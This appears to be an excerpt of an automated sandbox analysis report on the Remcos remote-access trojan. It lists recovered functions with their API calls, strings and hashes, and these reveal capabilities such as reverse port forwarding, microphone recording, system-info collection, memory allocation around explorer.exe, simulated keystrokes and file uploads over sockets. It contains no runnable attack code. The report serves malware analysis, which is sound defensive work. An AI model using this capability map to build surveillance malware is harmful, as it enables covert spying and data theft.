                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  • Opcode ID: 78c095f4105be351b2648146640295a9135c2fc0987ccdb541504fc44edccf3b
                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                  • Opcode Fuzzy Hash: 78c095f4105be351b2648146640295a9135c2fc0987ccdb541504fc44edccf3b
                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 0ade83845347d8525ce03316b53d9e05314995dc97b2a36bef330d1317d5e8b7
                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                  • Opcode Fuzzy Hash: 0ade83845347d8525ce03316b53d9e05314995dc97b2a36bef330d1317d5e8b7
                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                  • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                  • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 3815856325-2015055088
                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: dMG$|MG$PG
                                                  • API String ID: 1356121797-532278878
                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32 ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: PkG$XMG$NG$NG
                                                  • API String ID: 1649129571-3151166067
                                                  • Opcode ID: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32 ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  APIs
                                                  • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: xUG$NG$NG$TG
                                                  • API String ID: 3114080316-2811732169
                                                  • Opcode ID: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: a71d6f0dd6dcc93da5adf4ebdb912733ea44dcd57d8ae765127999729c86df5a
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Memory Dump Source
